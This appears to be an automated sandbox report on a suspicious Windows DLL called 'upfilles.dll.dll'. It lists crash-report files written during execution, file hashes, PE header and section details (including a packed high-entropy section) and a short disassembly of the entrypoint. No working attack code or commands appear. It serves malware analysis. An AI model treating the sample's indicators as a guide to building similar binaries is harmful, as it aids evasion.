                                                                                                              SHA-512:9432BA4BCEB6E8A6D56DB1CBD256C7A1C3835413B22B4CEC7A7D8D7FACC8A85CF7E981CDC802E9A7001EB67285401042ED97471A5617B1D8BC220A145DD928C2
                                                                                                              Malicious:false
                                                                                                              Preview:MDMP..a..... ........>f.........................................)..........T.......8...........T...............V...........T...........@...............................................................................eJ..............Lw......................T.......t....>f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER38DA.tmp.WERInternalMetadata.xml

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8534
                                                                                                              Entropy (8bit):3.6966319113948383
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:R6l7wVeJRBAmS6YojN4LgmfWfiwsprRC89br4Wf9vZm:R6lXJXAmS6YEegmfWqP7rxfi
                                                                                                              MD5:B607A2EB5584FD30993D12ABB2C4DF8A
                                                                                                              SHA1:F2E1E2CE69FB5F3AB9850FF3A56668B6DFAE0AFF
                                                                                                              SHA-256:DC1BDEED634E5907DFD137282558057ED000A00CD7BABC1ABC665D6B47410064
                                                                                                              SHA-512:249030B4D7B167C51DA04101F483BFE2D977EDE4D0DBAF6E45720002D56785033391999DCBE0591289B8DE51E15D1C1ADBCE641A4472471D0A4B869CED69DDAD
                                                                                                              Malicious:false
                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.1.6.<./.P.i.

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER3919.tmp.xml

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4777
                                                                                                              Entropy (8bit):4.480227848947886
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:cvIwWl8zssJg771I99aWpW8VYsYm8M4JCNCF0saFmjyq85mQCrAptSTSDd:uIjfqI7+b7VEJi8jGfpoODd
                                                                                                              MD5:76611ED68AE98A3C1C5418DA42AD9839
                                                                                                              SHA1:E56614DC31056975565348CCA2BC464DC61B1657
                                                                                                              SHA-256:1E7C757B8CED61BB0960A6FD8EE447BE3D82DF516B6DBF0CD4E9DD3CD465F897
                                                                                                              SHA-512:1852341A694CC87F021633950EA49ECE0FDC5D470769097BE801C9F5F525F77E075FF0F4FC9BAE3266E303161AB520D0DEFF756C4B6DF3F6CF50F20AD73A052C
                                                                                                              Malicious:false
                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="317586" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER459B.tmp.dmp

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:Mini DuMP crash report, 14 streams, Fri May 10 22:04:08 2024, 0x1205a4 type
                                                                                                              Category:dropped
                                                                                                              Size (bytes):57494
                                                                                                              Entropy (8bit):1.6234250646337964
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:duYrC6W3OMlUsn9pHz+bF7frc/wHGpzp/iaBReJd5U6:rhZgV9lxXpzp/9jePL
                                                                                                              MD5:66F2A3C376DA0D558312FF6110D838C3
                                                                                                              SHA1:834B317025A81AA5E7F00DF4430D56F7D760645B
                                                                                                              SHA-256:562F917C37C8D1E62F2E934483DEF3B9032D3EDBDE40154FD19E1CEA1BE2BAF2
                                                                                                              SHA-512:58CC96682B33937C6CBB1E4CA8C0F7A07A37CD327DF704A9149CEAD1272E8F4C2539691B2C8FA46B75BB017353F11C02BD129EFE4159EE3081DF67D534CB974C
                                                                                                              Malicious:false
                                                                                                              Preview:MDMP..a..... ........>f.........................................)..........T.......8...........T...........................T...........@...............................................................................eJ..............Lw......................T.......h....>f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER4619.tmp.WERInternalMetadata.xml

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8522
                                                                                                              Entropy (8bit):3.6962697567258553
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:R6l7wVeJtabmV6Y7pGgmfWP3prM89b+rWfxKm:R6lXJwbmV6YFGgmfWPT+6fd
                                                                                                              MD5:B71FE5E91F46A2F6E80793B28555315E
                                                                                                              SHA1:52F0EE991F743BEA0995768C5AA075635A979098
                                                                                                              SHA-256:7F8F6E795A696CA77E094A9664C2A6B795FFB3C2E9A5A6AEF1ED303C408F7EA0
                                                                                                              SHA-512:5CE960EE43F0BD8BEE75A7688B62FD8BD51F4CE59AF84251C28867D7FD5E54FF5E03D2D159A5C36D8B04415FB04CF4EA130D1036D1D8DC564B5B2F961FFE0203
                                                                                                              Malicious:false
                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.7.2.<./.P.i.

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER4648.tmp.xml

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4777
                                                                                                              Entropy (8bit):4.478653683433715
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:cvIwWl8zssJg771I99aWpW8VYpYm8M4JCNCF0laFniyq85mQCypptSTS6d:uIjfqI7+b7V1JilVGTppoO6d
                                                                                                              MD5:DA7D9A451274291EFD3755DC8FC3A141
                                                                                                              SHA1:51E42DA26BBC94435F94EFDBDF8A242CC744E57C
                                                                                                              SHA-256:821799E5797BB8E3BCB45C123C170C09004DB0C21BB4FC46A6F6A99DE66FFC12
                                                                                                              SHA-512:1AADD5F0D59B95756B48DFE2F6F95D358774409C5E209449411050C86A5F3990AE52D7AA1BBDD93063D712B6CB0DC84BE371833813004423128DF6949663B53A
                                                                                                              Malicious:false
                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="317586" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER4656.tmp.dmp

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:Mini DuMP crash report, 14 streams, Fri May 10 22:04:08 2024, 0x1205a4 type
                                                                                                              Category:dropped
                                                                                                              Size (bytes):54894
                                                                                                              Entropy (8bit):1.6839237359198767
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:59S8veE3+XuQRawUKUCGsV3bBvgoi7MxpnZ0mK1NX7RT9bCmYhJbqmpx5OqWRW/F:diYrCrOMzuJXeDwwx5OLIH9EyXh
                                                                                                              MD5:A837E0375D7983509A56860346CFCC15
                                                                                                              SHA1:F75FAE2A056C6FEF8D8F1D700F3412213DFFFB2D
                                                                                                              SHA-256:205CD9270682DC17A83E8D40610371F3ED964DD319E67BDBA4BE1780DF36D02F
                                                                                                              SHA-512:DAD398EB6A465DF561E9F4A51FD2D414C84CFFB7F34BC06FEE2515B88EDCAC48978359ADA324F8A441AE9304221089DF081651A0CC5B770D121A04ED586B5A4A
                                                                                                              Malicious:false
                                                                                                              Preview:MDMP..a..... ........>f.........................................)..........T.......8...........T...............v...........T...........@...............................................................................eJ..............Lw......................T.......x....>f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER46C4.tmp.WERInternalMetadata.xml

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8522
                                                                                                              Entropy (8bit):3.6958245523678235
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:R6l7wVeJoigmd6Y7GGgmfWfiwsprH89b+vWfuKm:R6lXJdgmd6Y6GgmfWq2+ef6
                                                                                                              MD5:57975B44072D1C9B3E80DB2266217745
                                                                                                              SHA1:A9CF9831C70448BFE57EB598D192F042A2AE3A6D
                                                                                                              SHA-256:415AD9CE27C4A61A389B2D2AE85DF89BB06FEFD9971BDB3399CAE445E58B8910
                                                                                                              SHA-512:93854E117CDB0F89602B01AA667CE2E15D7607242C6EC26A4B7060F5FCB7EB905ADB72A73E979F8B35E01DA8F21F8CEE3A99D7FA40DD04ABBBD3428F6F83C212
                                                                                                              Malicious:false
                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.8.8.<./.P.i.

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER4704.tmp.xml

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4777
                                                                                                              Entropy (8bit):4.481691067176541
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:cvIwWl8zssJg771I99aWpW8VYSYm8M4JCNCF0saFBwtjyq85mQCrdptSTSNd:uIjfqI7+b7VCJiP0GqpoONd
                                                                                                              MD5:243DA7FD47223239375D054C23BDE13D
                                                                                                              SHA1:01345C28EFD562EEDE44945D9F8B54A30951ABC4
                                                                                                              SHA-256:CF4636B318E7DCECACDC72437D290E86C0501BCA90B77EE7585C1C837614D3D3
                                                                                                              SHA-512:9BCE637D0F2AA10F4FD3BE688AFC8B97DC87CD20E03157250D55EC6368C6E353BB80A712BA982C01CA00B082C593634FA65DC3295A1EF8F9DCAA3C69330CCD3F
                                                                                                              Malicious:false
                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="317586" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                              C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1835008
                                                                                                              Entropy (8bit):4.46640558354698
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:/IXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNcdwBCswSb9:wXD94zWlLZMM6YFHa+9
                                                                                                              MD5:B7B3B5CD7790EDF0686FF777BA5097D3
                                                                                                              SHA1:ED234CE4B519238F46F4AA9519B3C51AFB301F20
                                                                                                              SHA-256:221475E4ACF30CBC675FA384CAE2C143B9C04EF7B913D8D65B0052080F31D095
                                                                                                              SHA-512:2F5813E176688BB57E91FD992373740377CDE50F0EBF56BD906A17D6325F158525F85FA13581310839B2EB9219FD5E6F03A3DE3E3E9A32CF3DAAC2D1BAE26831
                                                                                                              Malicious:false
                                                                                                              Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...%...............................................................................................................................................................................................................................................................................................................................................U..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                              Entropy (8bit):7.38766220411242
                                                                                                              TrID:
                                                                                                              • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                                                              • Win64 Executable (generic) (12005/4) 10.17%
                                                                                                              • Generic Win/DOS Executable (2004/3) 1.70%
                                                                                                              • DOS Executable Generic (2002/1) 1.70%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                                              File name:upfilles.dll.dll
                                                                                                              File size:520'704 bytes
                                                                                                              MD5:ccb6d3cb020f56758622911ddd2f1fcb
                                                                                                              SHA1:4a013f752c2bf84ca37e418175e0d9b6f61f636d
                                                                                                              SHA256:f4cb6b684ea097f867d406a978b3422bbf2ecfea39236bf3ab99340996b825de
                                                                                                              SHA512:6ed929967005eaa6407e273b53a1fedcb2b084d775bed17272fd05b1ce143dbf921ac201246dfbfdbe663c7351e44c12f162e6f03343548b69b5d4598bb3492e
                                                                                                              SSDEEP:12288:8XG3MpAOIQ1LjbJFqzqUtYP4VnRk62yoK2:SpAOfFJIq/Py8K2
                                                                                                              TLSH:4AB4BE4A37A80CB6E867C17D88634705E3B27D610761C6DF1290536F9F3BBD2663AB12
                                                                                                              File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........C.s.". .". .". .D.!.". .D.!o". .J.!.". .J.!.". .J.!.". tK.!.". .D.!.". .D.!.". .". q". tK.!.". tK.!.". tK.!.". tK? .". ."W .".

                                                                                                              File Icon

                                                                                                              Icon Hash:7ae282899bbab082

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x18000e1c0
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:true
                                                                                                              Imagebase:0x180000000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA
                                                                                                              Time Stamp:0x5C24FE09 [Thu Dec 27 16:30:01 2018 UTC]
                                                                                                              TLS Callbacks:0x80020fe0, 0x1
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:6
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:6
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:6
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:90ad3b5a283c3a333bb222c03419fb76

                                                                                                              Authenticode Signature

                                                                                                              Signature Valid:
                                                                                                              Signature Issuer:
                                                                                                              Signature Validation Error:
                                                                                                              Error Number:
                                                                                                              Not Before, Not After
                                                                                                                Subject Chain
                                                                                                                  Version:
                                                                                                                  Thumbprint MD5:
                                                                                                                  Thumbprint SHA-1:
                                                                                                                  Thumbprint SHA-256:
                                                                                                                  Serial:

                                                                                                                  Entrypoint Preview

                                                                                                                  Instruction
                                                                                                                  dec eax
                                                                                                                  mov dword ptr [esp+08h], ebx
                                                                                                                  dec eax
                                                                                                                  mov dword ptr [esp+10h], esi
                                                                                                                  push edi
                                                                                                                  dec eax
                                                                                                                  sub esp, 20h
                                                                                                                  dec ecx
                                                                                                                  mov edi, eax
                                                                                                                  mov ebx, edx
                                                                                                                  dec eax
                                                                                                                  mov esi, ecx
                                                                                                                  cmp edx, 01h
                                                                                                                  jne 00007F611CBAF4F7h
                                                                                                                  call 00007F611CBAF8D0h
                                                                                                                  dec esp
                                                                                                                  mov eax, edi
                                                                                                                  mov edx, ebx
                                                                                                                  dec eax
                                                                                                                  mov ecx, esi
                                                                                                                  dec eax
                                                                                                                  mov ebx, dword ptr [esp+30h]
                                                                                                                  dec eax
                                                                                                                  mov esi, dword ptr [esp+38h]
                                                                                                                  dec eax
                                                                                                                  add esp, 20h
                                                                                                                  pop edi
                                                                                                                  jmp 00007F611CBAF384h
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  dec eax
                                                                                                                  mov dword ptr [esp+10h], ebx
                                                                                                                  dec eax
                                                                                                                  mov dword ptr [esp+18h], ebp
                                                                                                                  push esi
                                                                                                                  push edi
                                                                                                                  inc ecx
                                                                                                                  push esi
                                                                                                                  dec eax
                                                                                                                  sub esp, 10h
                                                                                                                  xor ecx, ecx
                                                                                                                  mov dword ptr [00029DFEh], 00000002h
                                                                                                                  xor eax, eax
                                                                                                                  mov dword ptr [00029DEEh], 00000001h
                                                                                                                  cpuid
                                                                                                                  inc esp
                                                                                                                  mov edx, ecx
                                                                                                                  inc esp
                                                                                                                  mov ecx, edx
                                                                                                                  xor ecx, 444D4163h
                                                                                                                  xor edx, 69746E65h
                                                                                                                  mov ebp, ebx
                                                                                                                  inc ebp
                                                                                                                  xor ebx, ebx
                                                                                                                  xor ebp, 68747541h
                                                                                                                  inc esp
                                                                                                                  mov eax, ebx
                                                                                                                  or ebp, edx
                                                                                                                  inc esp
                                                                                                                  mov esi, eax
                                                                                                                  or ebp, ecx
                                                                                                                  inc ecx
                                                                                                                  xor ecx, 49656E69h
                                                                                                                  inc ecx
                                                                                                                  xor eax, 756E6547h
                                                                                                                  inc ecx
                                                                                                                  lea eax, dword ptr [ebx+01h]
                                                                                                                  xor ecx, ecx
                                                                                                                  inc ecx
                                                                                                                  xor edx, 6C65746Eh
                                                                                                                  cpuid
                                                                                                                  inc ebp
                                                                                                                  or eax, ecx
                                                                                                                  mov dword ptr [esp], eax
                                                                                                                  inc ebp
                                                                                                                  or eax, edx
                                                                                                                  mov dword ptr [esp+04h], ebx
                                                                                                                  mov esi, ecx
                                                                                                                  mov dword ptr [esp+08h], ecx
                                                                                                                  mov edi, eax
                                                                                                                  mov dword ptr [esp+00h], edx

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x36de00xbc.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x36e9c0x8c.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3e0000x1238.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x3b0000x22bc.pdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x3c4000x3278
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x400000x8fc.reloc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x315700x54.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x316d00x28.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x315d00x100.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x250000x3d8.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x10000x23a990x23c0087bfc32636bf93aa5ba6a79278de1d82False0.5472779173951049data6.420263931637599IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .rdata0x250000x12b200x12c000f7e92ec4b27ef7a718d78d4d512f916False0.4034114583333333OpenPGP Secret Key Version 34.778349716646358IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .data0x380000x2b340x1600a4dd3c567a44787ef36b75c1461eadc7False0.189453125data3.77323134284555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .pdata0x3b0000x22bc0x24004b6b0ab05d617b8443d04115ebcf4698False0.4678819444444444data5.261331885690949IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .rsrc0x3e0000x12380x1400262a27cc3c07916543c338d007e971a7False0.3376953125data4.197268760185116IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .reloc0x400000x8fc0xa00029935b97db1b1dda5ddd384d84afaceFalse0.52734375data5.178504761959821IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                  hVr0x410000x430000x42e00b359e2ed16a1c00b78e0035c276c8cf4False0.9683703271028037data7.985612673503669IMAGE_SCN_MEM_READ

                                                                                                                  Resources

                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                  REGISTRY0x3e6c00xcASCII text, with CRLF line terminatorsEnglishUnited States1.6666666666666667
                                                                                                                  REGISTRY0x3e5980x125ASCII text, with CRLF line terminatorsEnglishUnited States0.7747440273037542
                                                                                                                  REGISTRY0x3e6d00x1fcASCII text, with CRLF line terminatorsEnglishUnited States0.5866141732283464
                                                                                                                  TYPELIB0x3e8d00x7b8dataEnglishUnited States0.31983805668016196
                                                                                                                  RT_STRING0x3f0880x2cdataEnglishUnited States0.5681818181818182
                                                                                                                  RT_VERSION0x3e2000x398OpenPGP Public KeyEnglishUnited States0.45652173913043476
                                                                                                                  RT_MANIFEST0x3f0b80x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                  Imports

                                                                                                                  DLLImport
